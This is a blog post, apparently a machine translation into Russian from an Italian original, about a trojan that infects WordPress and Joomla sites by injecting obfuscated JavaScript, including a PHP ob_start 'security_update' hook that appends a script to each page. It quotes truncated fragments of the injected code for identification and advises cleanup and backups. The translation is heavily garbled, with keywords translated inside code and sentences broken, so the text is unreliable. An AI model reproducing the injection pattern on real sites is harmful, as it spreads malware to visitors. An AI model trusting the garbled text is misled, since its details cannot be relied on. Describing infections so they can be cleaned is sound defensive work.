Интересные объяснения атаки должны быть приняты imaginepaolo http://www.settorezero.com/ :

Это происходит чаще в последнее время, что многие сайты на основе WordPress и Joomla, подвергаются нападению в некотором роде троянских сообщает Avira как "HTML / Последние угрозы". Я не мог сказать, если это проблема с ошибками, существующих в этих двух издательских систем (но я сомневаюсь в этом), или, скорее, вирус, который напал серверами, на которых эти сайты.

Последняя гипотеза Я был поддержан факт, что все люди, которых я связался и у которых были те же проблемы, они все в то же хостинг-провайдера. Не двигаться даже обвинения на данный момент, потому что это довольно необычно, и я не нашел удовлетворительного информационной сети для того, чтобы сделать обоснованным предположением, так что мои только предположения и должны быть приняты в качестве таковых.

В то же время я надеюсь, что этот пост может быть полезной и обсудил понять, где проблема возникает.

Прежде всего, это означает, что вирус изменяет страниц (но не всегда все страницы сайта) с расширениями HTML, PHP, ASP и JS, добавив, зашифрованный код JavaScript, который начинается более или менее так:

  "javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <SCRIPT Язык = "javascript"> $ = \ "Z64dZ3dZ22q | если | qdu] qwys ^ е}} rub8tqiZ3c0 

Я говорю "более или менее", потому что не все выглядит точно так же, впрочем, легко определить вредоносный код, потому что, как видим, несколько затемняется: ключевые слова не только читать, но последовательности символов, кажется абсурдной.

Что касается WordPress, тем не менее, вредоносным кодом обычно вставляется на каждой странице "index.php" и начинается так:

1

( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <Php ob_start ("security_update"); функции security_update ($ буфера) {. Вернуть $ буфера "<script Language= \" JavaScript \"> $ = \" Z64dZ3dZ22q | если | qdu] qwys ^ и}

Похоже, что сценарий не вызывает повреждения и только обнаружен Avira (Ask). Проблема решается за счет устранения вредного воздействия скрипт страницы, или зарядки здорового копию страницы на сервер.

Некоторые пользователи, однако, после получения вируса, они обнаружили копию сайта (или других веб-страниц), хранящегося на компьютере с этой проблемой, то атака, кажется, "местные", а не удаленного: страниц, кажется, быть присоединены на том же ПК, в котором они проживают. Это заставляет меня думать, что все более серьезной проблемой хостинга: на самом деле многие из них на свой компьютер копию зараженного сайта, и существует на сервере этот скрипт страниц.

Решение, чтобы иметь возможность защитить вас всегда есть резервные копии вашего сайта на вашем компьютере и порядок ваш веб-сайт, если бы мы не предусмотрено.

Я приведу здесь некоторые полезные ссылки (в основном на Wordpress), связанные с проблемой представлены:

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://www.wordpress-it.it/forum/topic/12452

WordPress 2.8.5; Более 100 Хакерские атаки на Арубе

Похожие сообщения

• Нет Связанная Почта

Объявление